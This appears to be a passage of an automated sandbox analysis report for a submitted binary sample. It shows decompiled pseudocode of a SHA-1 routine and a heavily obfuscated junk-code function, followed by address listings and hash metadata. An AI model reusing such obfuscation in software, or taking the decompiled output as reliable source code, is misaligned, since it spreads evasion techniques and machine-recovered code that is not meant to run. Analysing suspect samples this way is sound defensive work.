                  					asm("rol eax, 0x5");
                  					_v16 = _t325;
                  					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
                  					_t358 = _v12;
                  					_t288 = _v8;
                  					asm("ror edx, 0x2");
                  					_v8 = _t413;
                  					_v12 = _t496;
                  					asm("rol esi, 0x5");
                  					_v16 = _t288;
                  					_t279 = _v12;
                  					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
                  					_t404 = _v8;
                  					asm("ror ecx, 0x2");
                  					_t463 = _t462 + 5;
                  					_t320 = _t499;
                  					_v12 = _t320;
                  					_v8 = _t463;
                  				} while (_t463 < 0x14);
                  				_t464 = 0x14;
                  				do {
                  					asm("rol esi, 0x5");
                  					asm("ror eax, 0x2");
                  					_v16 = _t404;
                  					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
                  					_t334 = _v12;
                  					_v12 = _t502;
                  					asm("rol esi, 0x5");
                  					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
                  					asm("ror ebx, 0x2");
                  					_t505 = _t279;
                  					_v16 = _t358;
                  					_t365 = _v12;
                  					_v12 = _t420;
                  					asm("rol edx, 0x5");
                  					asm("ror ecx, 0x2");
                  					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
                  					_t423 = _v12;
                  					_v8 = _t334;
                  					_v8 = _t365;
                  					_v12 = _t292;
                  					asm("rol eax, 0x5");
                  					_t464 = _t464 + 5;
                  					_t358 = _v12;
                  					asm("ror edx, 0x2");
                  					_t146 = _t505 + 0x6ed9eba1; // 0x6edad48d
                  					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
                  					_t295 = _v8;
                  					_v8 = _t423;
                  					_v12 = _t506;
                  					asm("rol esi, 0x5");
                  					_t404 = _v8;
                  					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
                  					_v16 = _t295;
                  					_t279 = _v12;
                  					asm("ror ecx, 0x2");
                  					_v12 = _t499;
                  				} while (_t464 < 0x28);
                  				_v8 = 0x28;
                  				do {
                  					asm("rol esi, 0x5");
                  					_v16 = _t404;
                  					asm("ror eax, 0x2");
                  					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
                  					_t470 = _v12;
                  					_v12 = _t510;
                  					asm("rol esi, 0x5");
                  					_t340 = _v8;
                  					asm("ror edi, 0x2");
                  					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
                  					_v16 = _t358;
                  					_t369 = _v12;
                  					_v12 = _t432;
                  					asm("rol edx, 0x5");
                  					_v8 = _t279;
                  					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
                  					asm("ror ecx, 0x2");
                  					_v16 = _v8;
                  					_t299 = _v12;
                  					_v8 = _t470;
                  					_v12 = _t434;
                  					asm("rol edx, 0x5");
                  					asm("ror eax, 0x2");
                  					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
                  					_v16 = _v8;
                  					_t437 = _t369;
                  					_t358 = _v12;
                  					_v8 = _t437;
                  					_v12 = _t522;
                  					asm("rol esi, 0x5");
                  					_v16 = _v8;
                  					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
                  					_t404 = _t299;
                  					_t279 = _v12;
                  					asm("ror ecx, 0x2");
                  					_v12 = _t499;
                  					_t341 = _t340 + 5;
                  					_v8 = _t341;
                  				} while (_t341 < 0x3c);
                  				_t478 = 0x3c;
                  				_v8 = 0x3c;
                  				do {
                  					asm("rol esi, 0x5");
                  					_t479 = _v8;
                  					asm("ror eax, 0x2");
                  					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
                  					_t346 = _v12;
                  					_v16 = _t404;
                  					_v12 = _t525;
                  					asm("rol esi, 0x5");
                  					asm("ror ebx, 0x2");
                  					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
                  					_v16 = _t358;
                  					_t370 = _v12;
                  					_v12 = _t445;
                  					asm("rol edx, 0x5");
                  					_v16 = _t279;
                  					asm("ror ecx, 0x2");
                  					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
                  					_t404 = _v12;
                  					_v12 = _t303;
                  					asm("rol eax, 0x5");
                  					_v16 = _t346;
                  					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
                  					_t305 = _t370;
                  					_v8 = _t346;
                  					asm("ror edx, 0x2");
                  					_v8 = _t370;
                  					_t358 = _v12;
                  					_v12 = _t532;
                  					asm("rol esi, 0x5");
                  					_t478 = _t479 + 5;
                  					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
                  					_v16 = _t305;
                  					_t279 = _v12;
                  					asm("ror ecx, 0x2");
                  					_v8 = _t404;
                  					_v12 = _t499;
                  					_v8 = _t478;
                  				} while (_t478 < 0x50);
                  				_t480 = _a4;
                  				_t480[2] = _t480[2] + _t358;
                  				_t480[3] = _t480[3] + _t404;
                  				_t311 = _t480[4] + _v16;
                  				 *_t480 =  *_t480 + _t499;
                  				_t480[1] = _t480[1] + _t279;
                  				_t480[4] = _t311;
                  				_t480[0x17] = 0;
                  				return _t311;
                  			}
































































                  0x0114b462
                  0x0114b466
                  0x0114b468
                  0x0114b468
                  0x0114b46b
                  0x0114b48d
                  0x0114b4b3
                  0x0114b4d9
                  0x0114b4fb
                  0x0114b502
                  0x0114b505
                  0x0114b508
                  0x0114b511
                  0x0114b517
                  0x0114b51e
                  0x0114b52f
                  0x0114b532
                  0x0114b535
                  0x0114b539
                  0x0114b53b
                  0x0114b53d
                  0x0114b546
                  0x0114b549
                  0x0114b54c
                  0x0114b557
                  0x0114b55d
                  0x0114b55f
                  0x0114b55f
                  0x0114b562
                  0x0114b565
                  0x0114b565
                  0x0114b56a
                  0x0114b56c
                  0x0114b56f
                  0x0114b572
                  0x0114b578
                  0x0114b57b
                  0x0114b57e
                  0x0114b587
                  0x0114b58d
                  0x0114b596
                  0x0114b5a5
                  0x0114b5ac
                  0x0114b5af
                  0x0114b5b2
                  0x0114b5bb
                  0x0114b5be
                  0x0114b5c1
                  0x0114b5d9
                  0x0114b5e0
                  0x0114b5e2
                  0x0114b5e5
                  0x0114b5e8
                  0x0114b5f1
                  0x0114b5f8
                  0x0114b5fb
                  0x0114b5fe
                  0x0114b60d
                  0x0114b614
                  0x0114b617
                  0x0114b61a
                  0x0114b623
                  0x0114b62d
                  0x0114b630
                  0x0114b63c
                  0x0114b63f
                  0x0114b646
                  0x0114b649
                  0x0114b64c
                  0x0114b651
                  0x0114b654
                  0x0114b65d
                  0x0114b66e
                  0x0114b671
                  0x0114b674
                  0x0114b67b
                  0x0114b67e
                  0x0114b681
                  0x0114b684
                  0x0114b686
                  0x0114b689
                  0x0114b68c
                  0x0114b695
                  0x0114b69a
                  0x0114b69a
                  0x0114b6af
                  0x0114b6b2
                  0x0114b6b5
                  0x0114b6bc
                  0x0114b6bf
                  0x0114b6c2
                  0x0114b6d7
                  0x0114b6de
                  0x0114b6e1
                  0x0114b6e5
                  0x0114b6e8
                  0x0114b6ed
                  0x0114b6f0
                  0x0114b6ff
                  0x0114b702
                  0x0114b709
                  0x0114b70c
                  0x0114b70f
                  0x0114b712
                  0x0114b715
                  0x0114b71d
                  0x0114b72b
                  0x0114b72e
                  0x0114b731
                  0x0114b731
                  0x0114b738
                  0x0114b73b
                  0x0114b73e
                  0x0114b746
                  0x0114b754
                  0x0114b757
                  0x0114b75e
                  0x0114b761
                  0x0114b764
                  0x0114b767
                  0x0114b76a
                  0x0114b773
                  0x0114b77a
                  0x0114b77a
                  0x0114b780
                  0x0114b799
                  0x0114b79c
                  0x0114b7a3
                  0x0114b7a6
                  0x0114b7a9
                  0x0114b7bb
                  0x0114b7c5
                  0x0114b7c8
                  0x0114b7d1
                  0x0114b7d4
                  0x0114b7db
                  0x0114b7de
                  0x0114b7e4
                  0x0114b7f7
                  0x0114b7fe
                  0x0114b801
                  0x0114b804
                  0x0114b807
                  0x0114b810
                  0x0114b813
                  0x0114b826
                  0x0114b829
                  0x0114b833
                  0x0114b836
                  0x0114b838
                  0x0114b841
                  0x0114b844
                  0x0114b857
                  0x0114b85d
                  0x0114b860
                  0x0114b867
                  0x0114b869
                  0x0114b86c
                  0x0114b86f
                  0x0114b872
                  0x0114b875
                  0x0114b878
                  0x0114b881
                  0x0114b886
                  0x0114b889
                  0x0114b889
                  0x0114b89c
                  0x0114b89f
                  0x0114b8a2
                  0x0114b8a9
                  0x0114b8ac
                  0x0114b8af
                  0x0114b8b2
                  0x0114b8c5
                  0x0114b8c8
                  0x0114b8d3
                  0x0114b8d6
                  0x0114b8e2
                  0x0114b8e5
                  0x0114b8eb
                  0x0114b8ee
                  0x0114b8f1
                  0x0114b8f8
                  0x0114b908
                  0x0114b90b
                  0x0114b911
                  0x0114b914
                  0x0114b91b
                  0x0114b91d
                  0x0114b920
                  0x0114b923
                  0x0114b926
                  0x0114b929
                  0x0114b930
                  0x0114b93f
                  0x0114b942
                  0x0114b949
                  0x0114b94c
                  0x0114b94f
                  0x0114b952
                  0x0114b955
                  0x0114b958
                  0x0114b95b
                  0x0114b964
                  0x0114b975
                  0x0114b97d
                  0x0114b983
                  0x0114b986
                  0x0114b988
                  0x0114b98b
                  0x0114b98e
                  0x0114b99b

                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Offset: 01140000, based on PE: true
                  • Associated: 00000000.00000002.324711621.0000000001140000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1140000_nSMFpXgLe7.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: (
                  • API String ID: 0-3887548279
                  • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                  • Instruction ID: e0970503844a911ecf78f22ade9850a7a377e06ac3705cefd38d1e136390817b
                  • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                  • Instruction Fuzzy Hash: BB021D76E006199BDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7315D674AA418F80
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 59%
                  			E01161506(void* __eax, signed int __ebx, void* __ecx, void* __edx, void* __esi) {
                  				signed char _t47;
                  				signed int _t52;
                  				signed int _t57;
                  				signed char _t60;
                  				signed int _t63;
                  				signed int _t68;
                  				signed int _t71;
                  				void* _t72;
                  
                  				_t52 = __ebx;
                  				_t60 = __edx + 1;
                  				asm("adc [0xdc829df8], edi");
                  				_t68 = __esi -  *0x8533973b;
                  				_t47 =  *0x1ba0b09d;
                  				asm("rcr dword [0xfdc8eefe], 0xde");
                  				if(_t68 < 0) {
                  					L1:
                  					asm("rol dword [0x229bb109], 0xeb");
                  					_t71 = _t71 + 1;
                  					asm("rol dword [0x124cdbfd], 0xe8");
                  					 *0xafc40dfd =  *0xafc40dfd << 0xef;
                  				} else {
                  					__edi =  *0x62fa987c * 0x9f6c;
                  					__esi = __esi +  *0xc53548ba;
                  					 *0xe27627ea =  *0xe27627ea - __ebx;
                  					 *0x70cf5619 =  *0x70cf5619 & __eax;
                  					_t9 = __ebx;
                  					__ebx =  *0x1f77fe62;
                  					 *0x1f77fe62 = _t9;
                  					_t10 = __cl;
                  					__cl =  *0xdf061218;
                  					 *0xdf061218 = _t10;
                  					asm("adc dh, 0x4");
                  					_push(__edx);
                  					__eflags =  *0x5ac8a71f - __edi;
                  					__ebp = 0xed789839;
                  					__ecx = __ecx | 0xf091b1f8;
                  					__ecx = __ecx ^ 0x054b23c1;
                  					 *0x604fdff =  *0x604fdff - __esi;
                  					asm("sbb dh, [0xb1509f24]");
                  					__ecx = __ecx ^ 0xf59e72f7;
                  					asm("rcr byte [0xc946004], 0xd9");
                  					__esi = __esi |  *0x2aa88a9c;
                  					__eflags = __esi;
                  					if(__esi != 0) {
                  						goto L1;
                  					} else {
                  						 *0xbeeb3b7b =  *0xbeeb3b7b >> 0xfd;
                  						asm("rol dword [0x23d9e9f7], 0x5b");
                  						__eflags =  *0x8a16faa8 - __bl;
                  						 *0xbcf43e =  *0xbcf43e << 0x7f;
                  						asm("rcl byte [0x72df5ae5], 0x3a");
                  						__esi =  *0xd5dda06b * 0x35c8;
                  						asm("adc al, 0x8");
                  						__eflags =  *0x7a190ab7 & __dh;
                  						__bh = __bh & 0x000000e2;
                  						__dl = __dl - 0x2a;
                  						_push(0xfed6b694);
                  						 *0xf61a1c0d =  *0xf61a1c0d | __ecx;
                  						_t13 = __dl;
                  						__dl =  *0xde5fd22a;
                  						 *0xde5fd22a = _t13;
                  						asm("sbb bl, [0x150f882a]");
                  						__ebx = 0x740d9203;
                  						__dl =  *0xde5fd22a - 0xa0;
                  						asm("rol byte [0x766da22c], 0x91");
                  						 *0x4e20a2c2 =  *0x4e20a2c2 + __esi;
                  						__ecx = __ecx - 0xa2ecbc39;
                  						 *0xc1410824 =  *0xc1410824 - __dh;
                  						asm("sbb esp, 0x6106160d");
                  						asm("cmpsb");
                  						__esi = __esi +  *0xa32a8b64;
                  						 *0x15698b2e =  *0x15698b2e - __edi;
                  						__eflags = __bh & 0x000000f9;
                  						 *0xc612db87 =  *0xc612db87 & 0xed789839;
                  						__esi = __esi &  *0xd4f32f6f;
                  						__bl = __bl +  *0x64002980;
                  						__edi =  *0x3e81cd69 * 0x7d8b;
                  						__eflags = __edi;
                  						if(__edi != 0) {
                  							goto L1;
                  						} else {
                  							0xed789839 +  *0x7a64727b =  *0x7713c005;
                  							 *0x7713c005 = 0xed789839 +  *0x7a64727b;
                  							 *0xe5498c39 =  *0xe5498c39 & __eax;
                  							__eflags = 0x740d9203 -  *0xb17f1cba;
                  							__eax =  *0xd1f9c189;
                  							__ecx = __ecx -  *0x8c1dc296;
                  							__ebp =  *0xf5246a83;
                  							asm("ror dword [0xd585b9fd], 0xb6");
                  							asm("cmpsb");
                  							__bl = 0x2a;
                  							__esi = __esi & 0xed68738e;
                  							__bl =  *0xa0ae7980;
                  							 *0xa0ae7980 = 0x2a;
                  							asm("sbb [0xe1bc4509], ebp");
                  							__esi = __esi ^  *0xb858f365;
                  							__eflags = __esi;
                  							asm("rcl byte [0x991e2cd2], 0x7f");
                  							_t18 = __edx;
                  							__edx =  *0xf2526709;
                  							 *0xf2526709 = _t18;
                  							if(__esi >= 0) {
                  								goto L1;
                  							} else {
                  								__ecx = __ecx - 0xb0051379;
                  								__eflags = __ecx;
                  								if(__ecx > 0) {
                  									goto L1;
                  								} else {
                  									__ebp =  *0x41e4697f * 0xb405;
                  									__ebp =  *0x41e4697f * 0x0000b405 ^  *0x41ec7e9d;
                  									__edx = __edx |  *0x92a9cc05;
                  									asm("sbb edx, [0xd00541f7]");
                  									__esi = __esi |  *0x41e398ce;
                  									asm("adc esp, 0x9cd9dc05");
                  									asm("ror byte [0x880541e5], 0xfc");
                  									__esp = __esp - 0x41f59098;
                  									__edx = __edx &  *0x6161df03;
                  									__dh = __dh |  *0x1dd52704;
                  									 *0xf85f0407 =  *0xf85f0407 + __ebp;
                  									_push( *0x5040716);
                  									__ch = __ch & 0x000000d2;
                  									asm("sbb dh, [0x22040710]");
                  									asm("sbb eax, 0x5070ed3");
                  									__eflags = __edx & 0x01b7bd0b;
                  									__ecx = __ecx + 1;
                  									__ebp = __ebp &  *0x9489db05;
                  									__ecx = __ecx -  *0x120541f7;
                  									__esi = __esi +  *0x41f99dbb;
                  									__eax = __eax ^  *0x7187e707;
                  									asm("sbb ah, 0xb5");
                  									__eax = __eax +  *0x7f5593e;
                  									__dh = __dh & 0x000000f9;
                  									asm("adc [0x43d6a39c], ebp");
                  									_push(__edi);
                  									 *0x61b607f5 =  *0x61b607f5 | __edi;
                  									__eax =  *0x553ddc9c;
                  									__edx = __edx ^ 0x588707f5;
                  									asm("sbb ebp, 0x4db8e79c");
                  									 *0x658908f5 =  *0x658908f5 - __edi;
                  									__eflags =  *0x658908f5;
                  									if( *0x658908f5 <= 0) {
                  										goto L1;
                  									} else {
                  										asm("adc esi, 0x9a4e676");
                  										__eax = __eax + 1;
                  										_pop(__ebp);
                  										_push( *0x83a9cb11);
                  										asm("adc dh, [0xb68f51a2]");
                  										asm("sbb [0xd4c36fd3], edi");
                  										asm("sbb ecx, [0x180b4798]");
                  										__ebx = 0x740d9202;
                  										asm("rcr dword [0x396f1427], 0xce");
                  										 *0x22b60fe0 =  *0x22b60fe0 | __dh;
                  										asm("sbb eax, 0xe87ab039");
                  										__eflags =  *0xacbe1b3a & __dl;
                  										__ebp = __ebp -  *0x5a46760e;
                  										__eflags = __ebp;
                  										asm("rcr byte [0x2212e004], 0xaf");
                  										L1();
                  										__eax = 0x1432dce8;
                  										if(__ebp != 0) {
                  											goto L1;
                  										} else {
                  											__eax = 0x765e1292;
                  											 *0x7fad7fb4 =  *0x7fad7fb4 & __dl;
                  											asm("adc esp, [0x9ab04239]");
                  											__ebx = 0x740d9202 +  *0xfb430b23;
                  											_pop( *0x55126905);
                  											asm("scasd");
                  											__bh = __bh - 0xe7;
                  											__bl = __bl | 0x000000b5;
                  											__esp =  *0xfe068606;
                  											__ecx = __ecx |  *0x716552dd;
                  											 *0x8a520c08 =  *0x8a520c08 - __ah;
                  											__eflags =  *0x8a520c08;
                  											_pop(__ecx);
                  											__ebx =  *0x96f32589;
                  											asm("adc esi, [0xc2f946cb]");
                  											 *0x748079b =  *0x748079b >> 0x11;
                  											if( *0x8a520c08 < 0) {
                  												goto L1;
                  											} else {
                  												__esi =  *0x1275df7c * 0x16f5;
                  												_pop(__ecx);
                  												__eflags =  *0x419c64c2 & __edx;
                  												_push(0x1acbc9c);
                  												asm("rol dword [0x6209f3b9], 0x6f");
                  												asm("sbb bl, [0x16c8e2a8]");
                  												_t25 = __ch;
                  												__ch =  *0x4034a91c;
                  												 *0x4034a91c = _t25;
                  												asm("adc esp, [0xcd236b11]");
                  												__ebx =  *0xe9bc9623;
                  												 *0x94b3753e = __ebx;
                  												__eax = 0x765e1292 ^  *0x59b6a71e;
                  												__esp =  *0x991c2706;
                  												 *0x20928c0a =  *0x20928c0a << 0x81;
                  												__esi = 1 +  *0x1275df7c * 0x16f5;
                  												__eflags = 1 +  *0x1275df7c * 0x16f5;
                  												if(1 +  *0x1275df7c * 0x16f5 < 0) {
                  													goto L1;
                  												} else {
                  													__edi = __edi - 0x4d0e3e78;
                  													__eflags =  *0x11dd25e4 & __cl;
                  													__esp =  *0xcfdb846b * 0x9132;
                  													asm("rcr byte [0xf0eb25e1], 0x5f");
                  													asm("adc ebp, [0x419460cd]");
                  													 *0xe4d40510 =  *0xe4d40510 | __ch;
                  													 *0x5d16d83e =  *0x5d16d83e << 0x3e;
                  													__eflags = __ebx - 0x2c14aff1;
                  													asm("sbb ebx, [0xfe1f93ef]");
                  													asm("adc esp, [0x36c52298]");
                  													__ch = __ch ^ 0x0000000a;
                  													_pop(__esp);
                  													 *0xae04a42e =  *0xae04a42e + __edi;
                  													 *0xe160833e =  *0xe160833e << 0x57;
                  													 *0xc58696c1 =  *0xc58696c1 >> 0xb8;
                  													__edx =  *0x581dcc2d;
                  													__esi =  *0x3da2ec6b * 0x10a2;
                  													__eax = __eax - 1;
                  													 *0x35e322fa =  *0x35e322fa << 0x9f;
                  													__esi =  *0x34b5c4d6;
                  													 *0x34b5c4d6 =  *0x3da2ec6b * 0x10a2;
                  													__ebx = __ebx -  *0xd2aae86f;
                  													 *0xebd2b867 =  *0xebd2b867 << 0x21;
                  													__eflags =  *0xebd2b867;
                  													_push(__edi);
                  													if( *0xebd2b867 != 0) {
                  														goto L1;
                  													} else {
                  														 *0xed564875 =  *0xed564875 | __esi;
                  														__eax = __eax - 0xc888a789;
                  														asm("adc edx, [0x9106e3ff]");
                  														__ecx = __ecx |  *0xd3f283dd;
                  														asm("rol byte [0x40c8ca00], 0x9a");
                  														asm("sbb eax, [0x3161e06f]");
                  														__edx = 0x6b1b12fe;
                  														_pop(__ebx);
                  														 *0x3d535118 = __dl;
                  														__edi = __edi +  *0x5d2ebb9d;
                  														__eflags = __edi;
                  														 *0x28868bbe = __esi;
                  														_pop(__esi);
                  														if(__edi < 0) {
                  															goto L1;
                  														} else {
                  															__eflags =  *0x67810e70 & __esp;
                  															_pop(__esp);
                  															__ebp = __ebp &  *0x77267b8e;
                  															__eflags =  *0xc8e11313 & __esi;
                  															asm("sbb [0x11de9930], dh");
                  															__eflags = __esp & 0x26c92d6e;
                  															_t35 = __ebx;
                  															__ebx =  *0x39d39b05;
                  															 *0x39d39b05 = _t35;
                  															asm("sbb ebp, [0xf1faa695]");
                  															_pop(__ebx);
                  															asm("ror dword [0x270528bc], 0x91");
                  															 *0x46660d19 =  *0x46660d19 & 0x1432dce8;
                  															__eflags =  *0x46660d19;
                  															if( *0x46660d19 < 0) {
                  																goto L1;
                  															} else {
                  																__edx =  *0xa1873c7c * 0x844f;
                  																__eflags = __edx;
                  																if(__edx <= 0) {
                  																	goto L1;
                  																} else {
                  																	__eflags = __esp - 0x8c231776;
                  																	__eax = __eax | 0x1a15de07;
                  																	__bh = __bh -  *0x9c4da9e3;
                  																	__esi = 0x208321b9;
                  																	 *0x14d45329 =  *0x14d45329 + 0x208321b9;
                  																	 *0x976d0a2a =  *0x976d0a2a << 0xeb;
                  																	__edi = 0x9a595abd;
                  																	__esi =  *0x94040260 * 0x46fa;
                  																	asm("lodsd");
                  																	__ebx = 0x43de5d13;
                  																	_push(__esi);
                  																	asm("scasb");
                  																	__ebp = __ebp +  *0x5df5e72e;
                  																	 *0x73dfbfb8 =  *0x73dfbfb8 >> 0x42;
                  																	__eflags = 0x9a595abd - 0xba51a587;
                  																	 *0x418d9ba1 =  *0x418d9ba1 - 0x43de5d13;
                  																	__ebp = __ebp + 0xb7ac0821;
                  																	asm("sbb ch, [0xecc3dca]");
                  																	__ebp =  *0x64155d3b;
                  																	asm("stosd");
                  																	asm("lodsb");
                  																	__ebp =  *0x64155d3b - 1;
                  																	 *0xbb496802 =  *0xbb496802 | __dh;
                  																	__eax = 0x7785b229;
                  																	 *0x7471fc6 =  *0x7471fc6 << 0xcb;
                  																	__esi = __esi;
                  																	 *0x11be59c5 =  *0x11be59c5 - __edx;
                  																	__ch = __ch & 0x000000e4;
                  																	__ebp =  *0xe0d7d093;
                  																	 *0xe0d7d093 =  *0x64155d3b - 1;
                  																	__edx = __edx &  *0xc6486f1;
                  																	__eflags = __edx -  *0xd5a1d01;
                  																	_push(0x9a595abd);
                  																	asm("rcl dword [0x11270e8f], 0xef");
                  																	asm("sbb [0xc9b6456e], ecx");
                  																	asm("sbb esi, 0x1f08e3cc");
                  																	__eflags =  *0x1689aa95 & __esp;
                  																	__esi = __esi | 0xf3eedfa3;
                  																	__eflags = __esi;
                  																	asm("sbb esp, [0x58711d27]");
                  																	if(__eflags < 0) {
                  																		goto L1;
                  																	} else {
                  																		asm("sbb edx, 0xa45adc70");
                  																		__ecx = 0xc4ba9eef;
                  																		if(__eflags > 0) {
                  																			goto L1;
                  																		} else {
                  																			asm("rcr dword [0x30b89477], 0xd0");
                  																			__ebp = 0xa5fd2725;
                  																			__bl = __bl & 0x000000b3;
                  																			__cl = 0xe6;
                  																			 *0xb7bdc865 =  *0xb7bdc865 >> 0x44;
                  																			__esp = __esp - 0x2b88d3;
                  																			__ebp = 0xa5fd2725 +  *0xa4d315c2;
                  																			asm("rcr dword [0x95495c17], 0x45");
                  																			 *0xbcbda0db =  *0xbcbda0db | 0xa5fd2725;
                  																			asm("adc al, 0x28");
                  																			__edi = 0x6848b7d3;
                  																			__esp = __esp | 0x32bb9683;
                  																			_pop(__ecx);
                  																			__edx = __edx -  *0x7ba219be;
                  																			__ebx = 0x43de5d13 &  *0xb0d225eb;
                  																			__esp = __esp &  *0x7a6c8001;
                  																			__esi = __esi |  *0x22cb7662;
                  																			__ebp = 0xa5fd2725 +  *0xa4d315c2 |  *0x6c8a5768;
                  																			asm("adc edx, [0xb13d15c2]");
                  																			 *0xa019206d =  *0xa019206d ^ 0x7785b229;
                  																			__edi = __esp;
                  																			 *0x8a2f7325 =  *0x8a2f7325 >> 0x5b;
                  																			 *0x73373ca3 =  *0x73373ca3 >> 0x15;
                  																			asm("rcr dword [0xecf33c1f], 0xb7");
                  																			__ebx = (0x43de5d13 &  *0xb0d225eb) - 1;
                  																			__al = __al - 0xb2;
                  																			__eax = 0x7785b228;
                  																			__esp = __esp +  *0x5883168f;
                  																			 *0x20935694 =  *0x20935694 + 0x6848b7d3;
                  																			__edi = 0x6848b7d3 ^  *0xd796b60d;
                  																			 *0xe0741718 =  *0xe0741718 << 0x3b;
                  																			__ah = __ah &  *0x53b85538;
                  																			__eflags = __ah;
                  																			_pop(__ebp);
                  																			asm("adc dl, [0x577e15d7]");
                  																			asm("adc edx, [0x2537897]");
                  																			if(__ah != 0) {
                  																				goto L1;
                  																			} else {
                  																				asm("sbb [0xdba81f75], esi");
                  																				__esi =  *0x47ecfb6a * 0x916c;
                  																				__edi = __edi & 0x59cc788d;
                  																				__edi = __edi +  *0xda2719be;
                  																				__edi = __edi + 0x66173bc2;
                  																				__esi = 0xa75cc1dd;
                  																				asm("adc esi, 0x404aa295");
                  																				asm("sbb edi, [0x764869f4]");
                  																				__ebx = __ebx | 0x9458832d;
                  																				_push(0xa75cc1dd);
                  																				__ebx = __ebx &  *0xeb0d2093;
                  																				__ecx = 0xc4ba9eef &  *0x573e2ddc;
                  																				__ebx = __ebx |  *0x8863fb98;
                  																				 *0xd7a55d9b =  *0xd7a55d9b & 0xa75cc1dd;
                  																				__eflags = 0x6848b7d3 - 0xf6f84611;
                  																				__cl = 0x116;
                  																				__ebp = __ebp +  *0xa11fe5c4;
                  																				__cl = 0x116 ^  *0x5a0bfcca;
                  																				asm("sbb eax, [0xe8f570d]");
                  																				__esp =  *0x2a101927;
                  																				__eflags = __edx -  *0x5ef51411;
                  																				if(__edx >  *0x5ef51411) {
                  																					goto L1;
                  																				} else {
                  																					__ecx =  *0x8620b37f * 0xbde7;
                  																					asm("sbb eax, 0x5a307765");
                  																					 *0x830c7ac7 =  *0x830c7ac7 ^ 0xa5fd2725;
                  																					_pop(__eax);
                  																					__esi = 0xffffffffc7f01871;
                  																					 *0xab77b615 = 0x43de5d13;
                  																					__esi = 0xffffffffc7f01871 |  *0x5c0e9ad8;
                  																					__eflags = 0xa75cc1dd;
                  																					asm("sbb eax, [0x2e10dec1]");
                  																					asm("movsw");
                  																					asm("rcr dword [0x3307ba83], 0x40");
                  																					if(0xa75cc1dd > 0) {
                  																						goto L1;
                  																					} else {
                  																						_pop( *0x53b86477);
                  																						asm("sbb esi, 0xe4d19be");
                  																						__eflags =  *0x461a3e07 & 0xa75cc1dd;
                  																						_t41 = __esp;
                  																						__esp =  *0x571b1065;
                  																						 *0x571b1065 = _t41;
                  																						__eflags =  *0xb7b8da8a - __dh;
                  																						asm("rcl byte [0x23bc670a], 0x93");
                  																						__edi = __edi |  *0xcd8c72f3;
                  																						__ch = __ch |  *0x21206db1;
                  																						__esp =  *0x571b1065 ^  *0x5c5f170e;
                  																						 *0xae3a1618 =  *0xae3a1618 + __ch;
                  																						__eax = 0x7785b228 &  *0x3702d39f;
                  																						__cl = 0x3c;
                  																						asm("sbb [0x7b1ed3ef], edx");
                  																						asm("rcr dword [0x8d00daff], 0xfc");
                  																						__esi = __esi +  *0x660df6ed;
                  																						asm("rcr byte [0xa83654b5], 0x32");
                  																						__eflags = 0x6848b7d3 -  *0x6adf7a1b;
                  																						asm("adc eax, 0xd583a815");
                  																						 *0xd9a1a512 = __dl;
                  																						 *0x8288442c =  *0x8288442c ^ __dh;
                  																						__dh = __dh + 0xb2;
                  																						 *0x33e9d93f =  *0x33e9d93f - 0xa75cc1dd;
                  																						__eflags =  *0x33e9d93f;
                  																						if( *0x33e9d93f > 0) {
                  																							goto L1;
                  																						} else {
                  																							__ebx = __ebx ^  *0x53b86477;
                  																							__ecx = __ecx |  *0x397911be;
                  																							__eflags = __ecx;
                  																							_pop( *0xaff0cea);
                  																							if(__ecx <= 0) {
                  																								goto L1;
